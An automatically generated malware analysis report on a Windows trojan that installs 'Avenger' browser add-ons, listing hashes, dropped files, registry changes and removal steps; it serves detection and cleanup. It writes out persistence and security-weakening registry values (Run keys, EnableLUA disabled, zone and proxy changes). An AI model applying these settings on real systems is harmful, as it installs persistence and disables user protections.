Trojan.Generic.14751428 (B) (Emsisoft), Trojan.Generic.14751428 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a18f07926ebefa60d8c8ea40c4b3482b
SHA1: 1b17f77e066b03dd6dc63bfe05891d152063eef7
SHA256: db6ad0a7efade93fcb039dbfcacb889ea7c3d54bcbc957523a4fe22bc57cb942
SSDeep: 49152:ZVo4O5W cFs83rMFr1k1wzTRX9DI3dfLc1H :ZVo4cWDF2Fr7zTRXQLc1H
Size: 3179008 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: StdLib
Created at: 2015-04-15 14:31:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1888
Avenger_v1.3(Admin).exe:844
VersionControl.exe:2024
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:
VersionControl_AvengerShimCacheMutexRasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_oleacc-msaa-loadedZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutex
File activity
The process %original file name%.exe:1888 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Avenger_v1.3(Admin)[1].exe (252235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\verson_Avenger.txt (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check_version[1].htm (180 bytes)
The process Avenger_v1.3(Admin).exe:844 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Program Files%\Avenger\GCAvenger\homepage.js (5 bytes)
%Program Files%\Avenger\Avenger.xpi (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\ZipDLL.dll (5500 bytes)
%Program Files%\Avenger\Avenger.dll (18744 bytes)
%Program Files%\Avenger\uninstaller.exe (1346 bytes)
%Program Files%\Avenger\GCAvenger\browser.html (464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\install_count[1].htm (105 bytes)
C:\end (105 bytes)
%Program Files%\Avenger\GCAvenger\background.js (966 bytes)
%Program Files%\Avenger\components.crx (10 bytes)
%Program Files%\Avenger\GCAvenger\logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\KillProcDLL.dll (32 bytes)
%Program Files%\Avenger\VersionControl.exe (82748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\inetc.dll (20 bytes)
%Program Files%\Avenger\GCAvenger\content_script.js (21 bytes)
%Program Files%\Avenger\GCAvenger\manifest.json (528 bytes)
The Trojan deletes the following file(s):
%Program Files%\Avenger\Avenger.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\ZipDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\Math.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\inetc.dll (0 bytes)
The process VersionControl.exe:2024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\verson_Avenger.txt (190 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check_version[2].htm (190 bytes)
Registry activity
The process %original file name%.exe:1888 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 72 99 B0 C5 BB 07 CE F9 35 7F 07 6B FA DA 32"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"Avenger_v1.3(Admin).exe" = "Avenger_v1.3(Admin)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process Avenger_v1.3(Admin).exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avenger]
"UninstallString" = "%Program Files%\Avenger\uninstaller.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\Interface\{91CF5980-024B-4C0D-B9DE-9D34E95FD776}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Google\Chrome\Extensions\bgagdciklpifeapjlecadfljlnpilkle]
"Path" = "%Program Files%\Avenger\components.crx"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\TypeLib\{06939DFE-D31B-4162-8E63-A74428F05927}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bgagdciklpifeapjlecadfljlnpilkle]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Ext\CLSID]
"{55E52727-37B2-475A-A69B-1EAA1E403D87}" = "1"
[HKCR\TypeLib\{06939DFE-D31B-4162-8E63-A74428F05927}\1.0]
"(Default)" = "RobotPluginLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1609" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCR\TypeLib\{06939DFE-D31B-4162-8E63-A74428F05927}\1.0\0\win32]
"(Default)" = "%Program Files%\Avenger\Avenger.dll"
[HKCR\CLSID\{55E52727-37B2-475A-A69B-1EAA1E403D87}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Safety\PrivacIE]
"DisableToolbars" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1609" = "0"
[HKCR\Interface\{91CF5980-024B-4C0D-B9DE-9D34E95FD776}\TypeLib]
"(Default)" = "{06939DFE-D31B-4162-8E63-A74428F05927}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1409" = "3"
[HKCU\Software\Avenger]
"ApplicationPath" = "%Program Files%\Avenger"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1400" = "0"
[HKCR\Interface\{91CF5980-024B-4C0D-B9DE-9D34E95FD776}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"
[HKLM\SOFTWARE\Google\Chrome\Extensions\bgagdciklpifeapjlecadfljlnpilkle]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCR\Interface\{91CF5980-024B-4C0D-B9DE-9D34E95FD776}]
"(Default)" = "IRobotPluginObj"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 21 62 8D 78 4C 6F 1B F7 D1 20 0A 88 10 0A 06"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"WarnOnClose" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "0"
[HKCR\CLSID\{55E52727-37B2-475A-A69B-1EAA1E403D87}\InprocServer32]
"(Default)" = "%Program Files%\Avenger\Avenger.dll"
[HKCU\Software\Avenger]
"jsonkeyword" = ""
[HKCR\CLSID\{55E52727-37B2-475A-A69B-1EAA1E403D87}]
"(Default)" = "Avenger"
[HKCU\Software\Avenger]
"InstalledVersion" = "1.3"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\BrowserEmulation]
"DisableSiteListEditing" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Avenger]
"UserId" = "1"
[HKCR\Interface\{91CF5980-024B-4C0D-B9DE-9D34E95FD776}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1400" = "0"
[HKCU\Software\Avenger]
"WinTitle" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4]
"1409" = "3"
[HKCR\CLSID\{55E52727-37B2-475A-A69B-1EAA1E403D87}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4]
"1609" = "0"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "2"
[HKCR\CLSID\{55E52727-37B2-475A-A69B-1EAA1E403D87}\TypeLib]
"(Default)" = "{06939DFE-D31B-4162-8E63-A74428F05927}"
[HKCU\Software\Avenger]
"Macaddress" = "00-0C-29-5C-94-64"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1409" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext]
"DisableAddonLoadTimePerformanceNotifications" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1400" = "0"
[HKCU\Software\Policies\Microsoft\Internet Explorer\TabbedBrowsing]
"Enabled" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{55E52727-37B2-475A-A69B-1EAA1E403D87}" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1409" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1400" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2]
"1609" = "0"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "0"
[HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bgagdciklpifeapjlecadfljlnpilkle]
"Path" = "%Program Files%\Avenger\components.crx"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3]
"1609" = "0"
[HKCR\TypeLib\{06939DFE-D31B-4162-8E63-A74428F05927}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Avenger"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\CommandBar]
"ShowCompatibilityViewButton" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Avenger" = "%Program Files%\Avenger\VersionControl.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{55E52727-37B2-475A-A69B-1EAA1E403D87}]
"(Default)" = "Avenger"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Avenger" = "%Program Files%\Avenger\VersionControl.exe"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{55E52727-37B2-475A-A69B-1EAA1E403D87}]
"NoExplorer" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Mozilla\Firefox\extensions]
"{4ED1F68A-5463-4931-9384-8FFF5ED91D92}"
The process VersionControl.exe:2024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 71 D8 01 C4 17 5E 64 91 CC F2 2C 08 69 A6 C6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
8352bb11cdd79c748d4d6ff45aa3df3a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Avenger_v1.3(Admin)[1].exe |
bc84780008d8e10b4287d9052cef3ab1 | c:\Program Files\Avenger\Avenger.dll |
a09bb82ff029f3b18a4b412aeae2d2de | c:\Program Files\Avenger\VersionControl.exe |
77fe1a97627c037163d5c7fb6aebd81d | c:\Program Files\Avenger\uninstaller.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1888
Avenger_v1.3(Admin).exe:844
VersionControl.exe:2024 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Avenger_v1.3(Admin)[1].exe (252235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%WinDir%\verson_Avenger.txt (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check_version[1].htm (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Program Files%\Avenger\GCAvenger\homepage.js (5 bytes)
%Program Files%\Avenger\Avenger.xpi (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\ZipDLL.dll (5500 bytes)
%Program Files%\Avenger\Avenger.dll (18744 bytes)
%Program Files%\Avenger\uninstaller.exe (1346 bytes)
%Program Files%\Avenger\GCAvenger\browser.html (464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\install_count[1].htm (105 bytes)
C:\end (105 bytes)
%Program Files%\Avenger\GCAvenger\background.js (966 bytes)
%Program Files%\Avenger\components.crx (10 bytes)
%Program Files%\Avenger\GCAvenger\logo.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\KillProcDLL.dll (32 bytes)
%Program Files%\Avenger\VersionControl.exe (82748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\Math.dll (2489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\inetc.dll (20 bytes)
%Program Files%\Avenger\GCAvenger\content_script.js (21 bytes)
%Program Files%\Avenger\GCAvenger\manifest.json (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\check_version[2].htm (190 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Avenger" = "%Program Files%\Avenger\VersionControl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Avenger" = "%Program Files%\Avenger\VersionControl.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name: Avenger
Product Name: Avenger
Product Version: 1.0.0.1
Legal Copyright: (c) Avenger. All rights reserved.
Legal Trademarks:
Original Filename: VersionControl_Avenger.exe
Internal Name: VersionControl_Avenger.exe
File Version: 1.0.0.1
File Description: VersionControl_Avenger
Comments:
Language: Language Neutral
